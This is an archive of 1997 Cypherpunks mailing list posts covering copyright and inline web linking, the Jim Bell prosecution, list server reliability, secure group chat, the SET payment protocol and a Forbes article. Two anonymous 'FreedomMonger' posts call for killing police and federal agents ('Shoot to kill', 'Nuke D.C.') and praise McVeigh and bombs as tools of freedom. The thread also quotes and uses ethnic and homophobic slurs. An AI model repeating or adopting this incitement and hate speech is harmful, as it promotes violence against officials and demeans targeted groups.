Message-ID: <199708192312.AAA03093@server.test.net>




Tim May  writes:
> >[hypertext links not copyright infringements]
> >
> >Am I on firm legal ground here?
> 
> I think so. Even quoting _blocks_ of someone's text is usually considered
> "fair use," and there have never, to my knowledge, been any cases in which
> a reference or pointer to a text was considered copyright infringement.
> References, as in bibliographies, are in fact just that, references or
> pointers. Saying "Go read Joseph Finder's "The Zero Hour"" is not an
> infringement of any sort.
> 
> As for Web pages, it seems clear that the same logic applies. Someone who
> makes their material available to anyone who follows a link cannot object
> when someone else publishes that link, no matter in what context.

You can get creative about how you reference material with the web
though.

For example say that you set up a page which contains your criticisms,
plus large chunks of, or the whole copyrighted document, using some
kind of inline web text directive.

It's the users web browser which is putting the parts together, the
copyright holders web server is serving some parts of the page, your
server is serving other parts.

For a visual example of this, check out:

	http://www.obscura.com/~shirts/

The inline image is in the UK, the rest of the page is on Lance's
machine.  The reason for this one is that the image is ITAR/EAR
sensitive, and Lance's machine is in the US.

Is it possible to include text in a web page?  I know you can do
images (as in the above example) by doing:

	Look what the silly copyright police are doing...

	

	isn't that a daft claim?

And copyright.police.com is serving their own image so they have no
grounds for complaint.  (Moi? I just referenced it... it was Joe Q
Publics web browser which combined my text and your copyrighted
image).

Now I don't think you can do

	

directly, but I'd be willing to bet you could do it with javascript/or
java, in such a way that the viewer wouldn't really figure out where
the various parts of the current "page" were coming from.

Anyway, the copyright police, WIPO, SPA etc. are the enemy in my book.
The difficulty of trying to applying these old laws to the internet
where they hardly make sense, suggests that copyright is going to have
to "give" longer term to adjust to reality.  Legislation against
gravity never works out long term.

I was kind of hoping eternity might become a small contributing factor
for this cause.  1 copyrighted text so far.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



On Tue, 19 Aug 1997, Tim May wrote:

> There is the testimony of one of his former friends that Bell claimed he
> had stinkbombed a lawyer he didn't like a few years back, apparently using
> the same mercaptin used (it appears) in the recent case. And didn't Alan
> Olsen say on this list that Jim had talked about such stinkbombs? It seems
> reasonable that a jury would believe Bell had ordered mercaptin, had told
> others he had used it in the past, and that an attack on a Portland IRS
> office followed his altercation over taxes with them by a few weeks. Were I
> on the jury, I think I'd think he did it.

Actually it was mentioned to me by a freind who has known Jim for many
years.  (Someone who I know well enough to trust his word on the matter.)
The only incident he mentioned was the one with the lawyer's office, not
the IRS "incident".  

> But, hey, maybe "jury nullification" could get him off.

Only if an AP bot were used. ]:>

> >The charges were fuzzy and minor.  Those sorts of things make them easy for a
> >strong advocate to ridicule in court.  Clearly a waste of the taxpayer's
> >money.  Their nature smells of political prosecution.  Another line of
> >defense.
> 
> No doubt a Gerry Spence could do this, but his court-appointed lawyer was
> most likely oblivious to such tactics, and was anxious to plead him out. As
> we all saw in the McVeigh case, court appointed lawyers really are not
> working for their putative clients.

Of course not.  Look who is paying the bills.

> My bigger fear, and no doubt Jim will someday read this and perhaps take
> umbrage at my comments here, is that this several-month "debriefing" period
> is where the Feds are collecting as much incriminating information against
> some of us as they can, perhaps with an eye toward hitting various of us
> with RICO charges, sedition, etc.

I am certain they can.  But it has become obvious that if they want to get
me on some phoney charge they will be able to do so no matter how I live
or act.  Better to be true to my beliefs that to act like a good little
sheeple.

> (Now _this_ would be a high-risk tactic for the Feds to take, as we who are
> charged might fight back hard, and actually win. Depends on the climate. If
> they link us to supplying strong crypto to various freedom fighters, and to
> money launderers (remember Anguilla), etc., then maybe a jury would
> convict. Not on sedition, perhaps, as this is hard to prove, but on RICO
> charges.)

The reason that I believe you will probably not get the "knock in the
night" is that you have the money and resources to fight them off.  They
are more likely to go after the "soft targets" of the semi-employed ranter
who just happens to step on the wrong toes.

> >He could have been aggressive and fought instead of wimping out.  Lots of
> >people have faced much more serious crimes and won.  It's not like Jim had
> >anything better to do.
> >
> >In such cases, an aggressive show of strength of character is best.  Weakness
> >invites oppression.  A rule that you - Tim - seem to follow in general too.
> 
> Well, Bell was about as extreme and aggressive as one can get...and yet....

On the list maybe, but his real life actions were not as aggresive as
maybe the government would like to claim.  He could have made a much
bigger stink than he did before getting nailed by the IRS.

> If I were to be arrested and held without bail--perhaps because of the
> "arms cache" and "chemicals" the news media would breathlessly report--I
> rather suspect my aggressiveness would fall on deaf ears.

And if they had you in a cell with the implied threat of moving you to a
tougher environment if you did not cooperate, you might cop a plea just to
get the hell out of there.

I am starting to believe that the reason that Jim got as pounded on as he
did was because he did not have the financial resources to fight back.

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From jya at pipeline.com  Tue Aug 19 16:43:42 1997
From: jya at pipeline.com (John Young)
Date: Wed, 20 Aug 1997 07:43:42 +0800
Subject: Status of Cypherpunks list sites?
Message-ID: <1.5.4.32.19970819232403.007303ac@pop.pipeline.com>



Okay, mace me, I'm still posting to toad, and receiving from it, 
along with dupes from cyberpass, and TAing the latency. Toad's 
stuff comes right through, fast, while it's +/- all over the chart from 
cyberpass -- up to eight hours delay at times, even a day later,
with answers to vital controversies coming before the issue is 
shown to be misunderstood squat.

Excuse cyberpass dis for disarray, but toad's speed is handy when 
you've nothing to say and want to instantly scream it very clearly to 
yourself and the empty void rather than face the horror of fixing insyntax.

And, praise elvis, not all vaporings that come from toad makes 
it past molassel cyberpass, although most eventually oozes in. 
Null stench especially pops up from world-sucking toad, the kind 
that makes one's own East Coast voidance smell not so bad. Until
the West Coast wakes up and sez jesus cork that, we're fetal lunged 
here.

Still, if Tim's right to call for toad discon, its reliable speedy 
drip drip drip of 24-hour addictive invective will be sorely missed 
when it presents a last time middle web and hops off into the swamp
leaving only one's own dig-itch digit to sniff and howl how awful.







From jburrell at crl5.crl.com  Tue Aug 19 17:16:14 1997
From: jburrell at crl5.crl.com (Jason Burrell)
Date: Wed, 20 Aug 1997 08:16:14 +0800
Subject: Encrypted talk
Message-ID: <199708192358.SAA00652@crl5.crl.com>



Does there happen to be a talk program out there that will allow more than
two people to talk at once, and allow them to speak securely with strong
cryptography, and will actually compile under Linux? 

Thanks.






From nobody at REPLAY.COM  Tue Aug 19 17:38:37 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 08:38:37 +0800
Subject: Tim May in the news
In-Reply-To: 
Message-ID: <199708200022.CAA13961@basement.replay.com>



At 12:35 AM 8/19/97 -0400, you wrote:
>Following tonight's "Chicago Hope," which dumped an immense wad of
>socialist propaganda on us ("Health care is a right!"  "No one should ever
>profit off a sick child."), the local news ran a CBS-produced feature
>about the internet.

Figures.

A hearty "up yers" is in order to them.

>First half showed how cute bunny-rabbit cartoons
>can educate your little hothouse genius.  Second half then explained how
>there are {gasp} dirty *sex* sites out there that junior could
>accidentally stumble across.  Obviously, something *must* be done.

Yeah, perhaps teaching your kids what's wrong and right, to the best of
your ability, and no less, as a parent.  Perhaps also teaching them how not
to get sucked into a pedophile.

>Feature included a representative teen who manfully resists the temptation
>to look at the feelthy pictures, 16-year-old Tim May of California.
>
>I'm not making this up.

?????

>I wonder if it's an accident or a deliberate middle-finger from the
>propagandists?

Sounds like an accident at first, but, well...
/===========================================================\
  Help win the fight against weak encryption!  Break RC5-56
 -----------|>  http://rc5.distributed.net/  <|-------------
               Member of Starbase XII RC5 Team
  Free secure e-mail, a reality?  Yes! Pretty Good Privacy
      available at http://web.mit.edu/network/pgp.html
\===========================================================/






From nobody at REPLAY.COM  Tue Aug 19 18:01:23 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 20 Aug 1997 09:01:23 +0800
Subject: The Real Bell Issue / Re: Bell, etc
In-Reply-To: <199708190730.JAA00747@basement.replay.com>
Message-ID: <199708200042.CAA15810@basement.replay.com>



At 09:30 AM 8/19/97 +0200, you wrote:
>The following, from the Columbian, lies at the heart of the
>  Every year, just before Income Taxes are due, the IRS picks out
>a few people to unjustly persecute in order to strike fear into
>the heart of the taxpaying sheeple.

Sounds plausible enough.

>  Apply for a tax refund and have every real or imagined sin you
>have ever commited used against you.
>  "A person who asked the IRS for a tax refund, had his home raided
>today by 20 armed government terrorists from a wide variety of
>government agencies.
>  "This person who asked for a TAX REFUND has never been proven to
>have anything to do with DRUGS such as METHAMPHETAMINE, and is not
>known to be a SPEED FREAK or a DRUG DEALER. As well, government
>agents investigating the person asking for the TAX REFUND have
>never found any ILLEGAL DRUGS on his person or property, but the
>person who asked for the TAX REFUND will be mentioned in connection
>with DRUGS and METHAMPETAMINE, or SPEED, CRANK, etc., for the rest
>of his life, every time he "comes to our attention" as a result
>of asking for a TAX REFUND."

The IRS (Internal Revenue Stealers) enjoys making examples of people who
dare to defy the income theft.

>  The IRS spends the whole year going after people who they deem
>to be guilty of tax evasion, and it is usually a fairly boring
>affair involving accountants and lawyers.

The blood-sucking variety.
/===========================================================\
  Help win the fight against weak encryption!  Break RC5-56
 -----------|>  http://rc5.distributed.net/  <|-------------
               Member of Starbase XII RC5 Team
  Free secure e-mail, a reality?  Yes! Pretty Good Privacy
      available at http://web.mit.edu/network/pgp.html
\===========================================================/






From dlv at bwalk.dm.com  Tue Aug 19 18:17:14 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 20 Aug 1997 09:17:14 +0800
Subject: Cypherpunks as a Terrorist Organization
In-Reply-To: 
Message-ID: 



Tim May  writes:

> As a matter of fact, I expect there have already been actions demanding
> that DejaNews purge their data bases of some posting or another. After all,
> they are truly a form of "eternity server."

I know for a fact that DejaNews has complied with a request from
one of the news.admin.* assholes to delete an article posted by
another person calling said asshole a pedophile.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From jeremey at bluemoney.com  Tue Aug 19 18:46:16 1997
From: jeremey at bluemoney.com (Jeremey Barrett)
Date: Wed, 20 Aug 1997 09:46:16 +0800
Subject: Encrypted talk
In-Reply-To: <199708192358.SAA00652@crl5.crl.com>
Message-ID: <199708200132.SAA00166@einstein.bluemoney.com>



-----BEGIN PGP SIGNED MESSAGE-----

Jason Burrell writes:
 > Does there happen to be a talk program out there that will allow more than
 > two people to talk at once, and allow them to speak securely with strong
 > cryptography, and will actually compile under Linux? 
 > 

Barring the existence of such a thing, find a talk/talkd that does
everything w/o the crypto, and tunnel it over ssh.

Jeremey.
- -- 
Jeremey Barrett                                BlueMoney Software Corp.
Crypto, Ecash, Commerce Systems               http://www.bluemoney.com/
PGP key fingerprint =  3B 42 1E D4 4B 17 0D 80  DC 59 6F 59 04 C3 83 64

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBM/pJOi/fy+vkqMxNAQHKbQP/Q+05PkCZktkOjkCuAnH/VhpVInYL4Zny
FcwGbRkoMWpeH1Q5kO4x3DbQRVYs3rVX1iUfrmY/iK2lGzRYhmkKDrnH9/s+oU3E
H5vPMmO42Pk6P1thiG35y1mNjdXdP+Ul+xVvuXQBcgAl8fIceE4VFigl3BprEH7o
LNeSEAjems4=
=OPk6
-----END PGP SIGNATURE-----






From anon at anon.efga.org  Tue Aug 19 18:59:26 1997
From: anon at anon.efga.org (Anonymous)
Date: Wed, 20 Aug 1997 09:59:26 +0800
Subject: The first days of our last days
Message-ID: <+EMwCJEYz8vfzObQpRBwVg==@JawJaCrakR>



At 12:00 PM 8/19/97 -0400, you wrote:
>A theat to him perhaps.  What ever happened to self defense I wonder?     
The police are supposed to handle it, or something.  Call 911 here while a criminal shoots your kids, while the ass on the other end asks questions until they hear a shot go off, and silence creep in.

That's why people use firearms.

>Not unless he joins the book people in the woods. :)

I ask for the honor of memorizing 1984.

>A few years back when the anti-gun crap started in NYC, they had all sorts
>of save the kids propaganda stories and projects: such as trade your gun
>for a toy, and stories like 8 year old shot dead by drug deal for
>threatening to use water pistol.

Now they have new Communist/Socialist/Fascist propaganda and other programs around the U.S..  Ever hear of that shit with kids turning in toy rifles, weapons of destruction, for books?  I read books as a child, and still, i had toy rifles.

Of course the kids were spewing out the Usual UN Globalism, totalitarian, and disarmament shit.  "I think dat guns are bad, they kill people."  the question is: What people?  As far as I see it, fascists, and freedom-thefters.

>Jim Bell was arrested for thinking
>differently than is allowed.  No different than being declared insane and
>sent to the Gulag for "re-education" for disagreement with the party, the  
>glorious party.  Not having lived in communist or fascist countries, the
>sheeple are asleep.

Obvious from the cry of freedom from McVeigh, destroying the minions of the fascists, and of course only being shown as a child killing monster.

>My parents having left a socialist state (read fascist) for freedom, I
>find freedom fleeting.  The same scum that ran the communist block are
>here running our country.  Sure they were born here, but their spirit and 
>beliefs are the same as the scum that were in power in the old country.   

Knowing friends of relatives who lived in East germany, they have many stories to tell.

>How much money are we to bleed to them in taxes (read plural, as in
>income, realestate, hotel, parking, gas and electric, telephone, taxes on
>tax returns, etc.)?  How soon before breathing taxes? Fucking Taxes?

I believe one of americas founders (a faggot, by word of Patrick Oonk, a Nazi) once asked this about britain putting taxes on breathing.  Soon after, we fought back and eventually sent those murdering sons of bitches running.

That day will live in my mind as being the day we all said ENOUGH!!!!

>Living Taxes?  Speaking Taxes?  Let's not pretend.  We work for them.
>It's mandatory work.  Our work pays their goals.  Doesn't matter if you
>work for Mickey D's or Mickey Soft.  You pay Big Uncle.  You work for Big
>Uncle's benefit.  It's not enough to fear Big Uncle.  You must love big   
>uncle.  One may not even hold anti-government views for fear of being in
>contempt of court and be judged against.

No wonder the suicide rate is up.

>How soon before they stop teaching highschool kids about the revolution
>for fear it will happen again?  How soon before they edit the constitution
>and pretend it was always that way?  How soon before we'll need passports
>to travel between one part of the country and another?  Between one 'burb
>to another?

Well, we alread have shit like this.

>How soon before we have to register every computer out there?  How soon
>before we have to register every phone and phone card?  Every pencil and   
>knife and fork and other sharp objects? How soon before night curfews?
>How soon before Victory Coffee and Gin?  How soon to food rations?  How
>soon to electricity rations and water rations and net access rations? How
>soon before ex-communist Russia has more freedom than we?

Now.

>They've already silenced us, they've already taken our guns, they've
>already thrown us in jail for feeding others, for speaking, thinking and  
>protesting, and demanding privacy, they've already stripped our privacy,   
>they've already murdered us, they've already licensed everything we can do 
>and can't, they've already filled the streets with jackbooted gun and
>nightstick toting thugs who wear blue and use bathroom plungers as means
>of interrogation.

May those cops burn in the pits of hell.

>What next?  And how soon?

Telescreens?  Thought Police?  Junior Scouts?  Eastasia and Eurasia?  INGSOC, Death-Worship, and Neo-Bolshevism?  How long before we get helicopters looking in windows?  How long before Two-Minutes hate?  How long before we have the Party?  how long before we have the Sex restrictions?  How long before our children become blind followers?  After all, communism's laws are 1. infiltrate the school system 2. sit back and watch. How long before we all become enslaved, without knowing?

Soon.  very Soon.

LOCK AND LOAD.  Shoot to kill.

Sometimes, we fight back, even if there is no hope.  Why?  Because it is better to die on our feet than to live on our knees.

The first days of the last days of freedom are now.

Will we win?  I say yes. Fascists say no.

The war is underway.

FreedomMonger
"It is better to die on our feet than to live on our knees."






From nobody at neva.org  Tue Aug 19 19:43:05 1997
From: nobody at neva.org (Neva Remailer)
Date: Wed, 20 Aug 1997 10:43:05 +0800
Subject: None
Message-ID: <199708200215.TAA12539@mail-gw2.pacbell.net>




At 08:38 PM 8/18/97 -0700, you wrote:
>Things like the doublespeak of "mandatory voluntary" programs, the probable
>illegalization of tools to protect communications, and the "New World
>Order" machinations. (These being the behind the scenes pressures being
>applied to European and Asian governments, vis-a-vis Wasenaar, OECD, the
>secret meetings, the Orwellian language the governments are adopting to
>describe "trusted third parties (who actually provide keys to the
>authorities without telling the customer)," etc.)

I myself would never escrow my keys to anyone, regardless.  As far as I see it,  giving sensitive things like that to anyone but yourself is asking to be screwed.

>Not to mention the "felonization" of increasing numbers of things. Physical
>things that were bought fully legally are now "contraband." Except to cops,
>who are buying them in ever-increasing amounts. The sheeple, though, cannot
>be trusted to own the things the cops own freely. And I'm talking about
>more than just "compliance tools" (aka toilet plungers).

Maybe we'll see a ban on assault plungers in a few years.  We may have to register our assault plungers as well.

>Read the archived traffic of the list in the period surrounding the burning of the
>illegal religion in Waco, Texas. Or the traffic after a wife and son were
>killed by the cop criminal Lon Horiuchi (whom some militia members have
>placed a bounty on

FWIW, I wish someone would put a bounty on the murdering bastard marines who killed an innocent american defending himself against heavily armed fascists.  If we were half the damn great country we were in the beginning, he'd be plinking with an M-16A2, fu!
lly auto.  So if those bastards even twitched in the dark, they'd be ripped open like the pigs they are.

>I think you, "B.," have just gotten a lot more nervous that what many of us
>are advocating is in fact warfare against the State. I get e-mail from
>folks who were once active on the Cypherpunks list saying, in various ways,
>that they can no longer be as visible about their participation in the
>list, for multiple reasons.

Government fascism and investigation.

>Second, the apparent state of war between Cypherpunks and governments.
>After recent actions by freedom fighters to bomb stooge facilities,
>governments are treating "militias" as quasi-criminal organizations.

They treat everyone like a criminal organization.

>(There
>are many nuances to this point. In the U.S., I don't think such
>organizations have been outlawed, as the Constitution remains a protection
>of sorts.

Yeah, an original version still goes underground each night.  It seems to me soon Mr. KlinToon might replace it with a replica, so he can light a joint with it.  "Ahhhh, thar's nuthin' like freedom to light uh joint!"

>But many have been investigated, and, as John Young noted
>recently, the IRS treats membership in certain organizations as a threat.
>And there is Clinton's Anti-Terrorism Act, which explicitly makes certain
>kinds of financial and other activities illegal, even by Americans, which
>involve support of "terrorist" organizations.

So remember, in the future, speaking nicely about the cypherpunks may get you a free midnight raid by the military, being used illegally on U.S. soil.

>It is not inconceivable that,
>following outlawing of strong crypto in various countries, that the
>Cypherpunks group gets classified as an organization or group which
>supports terrorist goals, which is almost certainly true.)

Well, I guess that fascist countries like France, China, Russia, Burma, etc. will consider us bombmakers.

>Third, some of those who make the most extreme calls for the killing of
>Feds, the bombing of government operations in various nations, etc., are
>using remailers. Isn't this exactly what remailers are likely to be used
>for?

If they aren't shut down and raided first, by freedom and privacy thefting Sons of bitches.

How about a "Defensive Weapons for Remailer users (except for Ratprick Oink)" charity.

>Fourth, the arrest and prosecution of Jim Bell, with tax evasion and a
>minor stink bomb case turned into a "federal case" because of his
>controversial views.

So soon people like Phil Zimmerman, who believes in privacy for all, will be raided and stolen in the middle of the night, much like in 1984.

>This has obviously angered and radicalized many. Some
>of us have stocked up on more asault weapons and shotguns, placed alarms
>around our property, and we are expecting a "raid."

Well, luck be with you and shoot to kill people.

>As I have said, if
>black-clad ninja raiders try to hit me, I'll assume they're "home invaders"
>and will open fire. (A Sheriff's Deputy once told me that even saying I
>would defend my home against unwelcome intruders constituted a "threat" and
>that he might order a detachment to visit my compound. So far, two years
>later, he hasn't made good on _his_ threat. And now I'm more ready for him
>than ever.)

Time to make like Bob Marley and shoot the sheriff.

So now defending your home, something so basic of human rights its unabridgable, the right to live, essentially, is now illegal?  Fuck them all!!

>So when "DeathMonger" calls for the killing of
>Feds, who am I to suggest this discussion be squelched? Forcible
>censorship, once tried, often makes it effectively impossible for _any_
>kind of guidance or advice along these lines. (This is an utterly
>predictable outcome of attempts to censor.)

Many fascist god-fearing quivering sheeple feel differently.

>Finally, and to recap some of these points, when the Cypherpunks list and
>group first started, many did not take the "collapse of government"
>promises too seriously. Now, with even Louis Freeh and Janet Reno saying
>that strong crypto represents a major and urgent threat to governments
>(they call it "law enforcement" and "tax collection," and also talk about
>threats of unregulated gambling, unregulated access to medical data,
>uncontrolled communication between cult members, and so on), it seems that
>the dangers of crypto anarchy are being more widely trumpeted.

It's only dangerous, no, deadly, to fascist freedom-thefters like Freeh and "Flaming Davidian" Reno.  To freedom lovers, it's another tool of freedom, like guns, constitutions, and bombs.  Yes, BOMBS have won freedom, and guns as well.  As long as we excer!
size our right to defend freedom, our current gooberment will continue to crush those rights.  Guns were made for defense, especially towards tyrants.

>So, "B.," stop apologizing for reading the list. You're already a marked
>man in their eyes...and search engines can already identify the True Name
>who is posting the last year or two as "Zooko Journeyman." In a couple of
>years, all search engines will have "known aliases" macros to automatically
>ferret out the web of pseudonyms linkable to a poster. You can run, but you
>can't hide.

All the more reason to arm yourself.  If you can't hide, then fortify yourself in your home, armed to the teeth to deter invader maggots like swat teams, Marines and BATF agents.

>And "democracy" is spinning out of control, being used by authoritarians to
>convert the world into a security state. Restrictions on travel, new drug
>laws, laws against images and words on the Net, and thousands of new laws
>every years.

The best solution?  Nuke D.C., the current constitution, and reinstate the old one, start from scratch.  We've messed up the system, and it's time to start all over again.

>A frontal assault, using strong crypto to aid in the attacks by freedom
>fighters and to destablize authority, makes more sense. When a government
>official decrees that citizen-units may no longer do certain things which
>were once quite legal and quite common (such as owning a gun for defense),
>that official must expect certain repercussions.

Dead bodies of the soulless minions who inhabit fedral buildings, moving us toward Globalism.

>We're in a state of war with the statists and tyrants. It's what Jefferson
>and the other Founders expected to happen, and now the watering with the
>blood of patriots and tyrants is happening.

A text file:

Using this analogy, the Constitution is the fence, my sovereignty
is my property. The contract has been moved more and more into my
"property". Do I protect the fence? No, I move it back to where it
was. Even if I have to kick my neighbors ass to do it.

But I see it slightly differently. The fence hasn't been moved. It's been
torn down and ripped apart. On my side of the fence is me, my family
and my possesions; including a nice big banana tree.
On the other side of the fence is a 400lb gorilla, just eyeing that
banana tree.
As the fence gets erroded by weather, insects and rodents, the gorilla
is getting bolder and bolder.
My solution is a) shoot the gorilla (100% effective, but somewhat
drastic) or b) rebuild the fence, kill the insects and poison the rats.
So to keep my bananas, I'm forced w/rebuilding the fence, or if that
fails, shoot the gorilla. I'd rather rebuild the fence, as that gorilla
can be mighty entertaining, but if the fence is coming down faster than
I can rebuild it, the gorilla is history.
So I ask you: Can we rebuild the fence or is it time to take aim?

>It's what the Founders expected.  Get used to it.

Agreed.

>If crypto anonymity tools were available to the Founders, they'd have used
>them against the British. Likewise, strong crypto is already being used by
>the freedom fighters in Palestine against the Zionist Occupation
>Government. That PGP 5.0 is being used by Hamas should send chills through
>the ZOG in Jerusalem, and is probably why Cypherpunks is about to be
>classed as a "terrorist group."

To israelis, anyway.

>(What happened to the Jews in WW II was terrible, of course, but that was
>no excused for forcibly evicting vast numbers of "sand niggers" so as to
>make room for Jewish settlers. Their sons and grandsons will now end up
>paying the price, as freedom fighters drive them into the sea. Broken eggs
>and all.)

Much like how some schills on the list blasted someone for weeping over the death of McVeigh.

"You can't be serious, he murdered innocent kids!"

"I hope McVeigh fries.  Same to his friend Terry.

I Hope the writer of that fries.  Along with those in government.

Can we rebuild?  I doubt it.

Therefore, sincerely,

LOCK AND LOAD.

FreedomMonger
"There's something wrong when modern military weapons can't be used by americans, but military weapons in 1776 were used daily by citizens."

Military uniforms aren't even speed-bumps for bullets entering them.







From ichudov at Algebra.COM  Tue Aug 19 20:00:21 1997
From: ichudov at Algebra.COM (Igor Chudov @ home)
Date: Wed, 20 Aug 1997 11:00:21 +0800
Subject: Status of Cypherpunks list sites?
In-Reply-To: <199708192203.XAA03398@notatla.demon.co.uk>
Message-ID: <199708200238.VAA09439@manifold.algebra.com>



Prof. Antonomasia wrote:
> 
> 
> TCMay wrote:
> 
> > Not too long ago I was subscribed to the "cypherpunks at algebra.com" address,
> > and the list stopped flowing to me for a day or so. I resubbed under

That was my fault, I improperly killed sendmail and then went to the
country for a day or two.

> > "cypherpunks at cyberpass.net." I noticed that Igor Chudov said he was taking
> > a hiatus from the Net and lists, so I wondered if this meant his support
> > for his site was either being dropped or might be subject to more frequent
> > outages.
> 
> I re-subscribed to the algebra list when I returned from HIP97
> and in fact got onto the ssz list.  Seems like Igor diverted the
> subscription.  Comments, Igor ?

I have no idea how such a diversion could happen, if we assume that no
hacking is taking place. I think that it is more likely that you were
confused by headers. It seems that now cypherpunks list works just fine,
although I would appreciate if you correct me.

I do, indeed, try to stay away from the Net as far as possible (that is,
do nothing that is not directly related to making or saving money).
Therefore, please, report any problems with cypherpunks at algebra.com
to me directly.

> > And shouldn't we all be making a more serious effort to drop the use of the
> > "cypherpunks at toad.com" address, as John said some months back that he would
> > support forwarding stuff for a while, but not necessarily forever. As it
> > is, it just adds another hop and another potential weak link.
> 
> Yes.

As long as everyone uses distributed servers to receive the list traffic,
removal of the toad.com address will be quickly noticed.

	- Igor.






From rah at shipwright.com  Tue Aug 19 20:13:13 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 20 Aug 1997 11:13:13 +0800
Subject: Forbes article on Financial Cryptography is coming
Message-ID: 



Coming soon to a newstand near you...

I hear the article will include pictures of cypherpunks and FC97 attendees
like Ian Goldberg (FC97 workshop leader), Adam Shostack (FC97 workshop
instructor), Sameer Parekh, and Steve Schear.

Not to mention actual financial cryptographers like David Chaum and Ron
Rivest. :-).


Cheers,
Bob Hettinga

--- begin forwarded text


X-Sender: rah at mail.shipwright.com
Mime-Version: 1.0
Date: Tue, 19 Aug 1997 18:12:03 -0400
To: e$@thumper.vmeng.com, dcsb at ai.mit.edu
From: Robert Hettinga 
Subject: Forbes article is coming.
Sender: 
Precedence: Bulk
List-Software: LetterRip 2.0 by Fog City Software, Inc.
List-Unsubscribe: 
List-Subscribe: 

I just got called by a fact checker from Forbes.

She said that the article on financial cryptography that Josh McHugh is
doing is one of two being considered for the cover of the next issue.

Having some fun now, as Mr. Martin used to say...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/




---------------------------------------------------------------------
Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info at hyperion.co.uk
---------------------------------------------------------------------
Like e$? Help pay for it!  See 
Or, for e$/e$pam sponsorship, 
---------------------------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From rah at shipwright.com  Tue Aug 19 20:46:45 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 20 Aug 1997 11:46:45 +0800
Subject: SET discused in Risks Forum
Message-ID: 




--- begin forwarded text


Date: Tue, 19 Aug 1997 15:42:21 -0400
From: pj ponder 
Subject: SET discused in Risks Forum
To: set-discuss at lists.Commerce.Net
Mime-Version: 1.0
Sender: set-discuss-owner at mail.irm.state.fl.us
Precedence: bulk

+----------------------------------------------------------------------+
This message was addressed to:  set-discuss at lists.commerce.net
+----------------------------------------------------------------------+

-----BEGIN PGP SIGNED MESSAGE-----


Just got this on the Risks Forum
(usenet comp.risks; html: http://catless.ncl.ac.uk/Risks)
I apologize if this has been posted here already and I missed it.

- -----------------------  from comp.risks:  -------------------------------
Date: Sat, 16 Aug 1997 16:20:14 -0700
From: smartcard at sprynet.com
Subject: SET risk

The Secure Electronic Transaction (SET) process is proposed by the
credit-card associations to secure credit-card usage on the Internet.  It
consists of a 28-step process using a standard digital certificate.  It
relies on vendor software to provide security.  These include an
electronic wallet program in the originator's PC, merchant review software
at the merchant's bank, card transaction processing software at the card
issuer bank and merchant software in the merchant's server.

The SET process claims to be better than using a credit card on the
Internet.  However, the SET process has three serious exposures - confirmed
with IBM and HP/Verifone. The process does NOT know who is presenting the
certificate.  The process does NOT know if merchant employees have
redirected the certificate through another merchant.  All of the critical
software is directly accessible by the card users, merchant employees and
bank employees.  Historically, these individuals have been the prime source
of fraud in credit card transaction systems.

There are more than 50 other card security products available for Internet
usage. They are generally simplier, faster, and avoid the SET exposures
identified above.  Internet transaction users might try the viable
alternatives.

jerome svigals, smartcard at sprynet.com


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM/n5lF4ZsVsZPDGdAQFdwgQAu8IZGp153xgyJs5km/ah7KYtMmwT8k4d
Pqo1I5qV532thAIjL8y5uGwxraTTQjxOcWTwvP7Y+Z+wh1467nAElYY1t4VPEB1m
K0nZ/3r7kDelj5Jp6H2fTPdBdHWrEj5m/XrTmhVYb0dkQSxW1gFN39y+7AGeBQsO
ctgUfEJY2tU=
=188u
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------
This message was sent by a majordomo-based automatic list manager.
Subscriptions to and archives of this list are available to any person
or organization.  For further information send a mail message to
'set-discuss-request at lists.commerce.net' with 'help' (no quotations)
contained in the body of your message.

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From rah at shipwright.com  Tue Aug 19 20:47:38 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 20 Aug 1997 11:47:38 +0800
Subject: Status of Cypherpunks list sites?
In-Reply-To: <1.5.4.32.19970819232403.007303ac@pop.pipeline.com>
Message-ID: 



At 7:24 pm -0400 on 8/19/97, John Young wrote:


> Still, if Tim's right to call for toad discon, its reliable speedy
> drip drip drip of 24-hour addictive invective will be sorely missed
> when it presents a last time middle web and hops off into the swamp
> leaving only one's own dig-itch digit to sniff and howl how awful.

Younglish? Youngbonics?

God, I *love* this list...

Cheers,
Bob Hettinga
"yeah, I know, it's self-referent"

-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
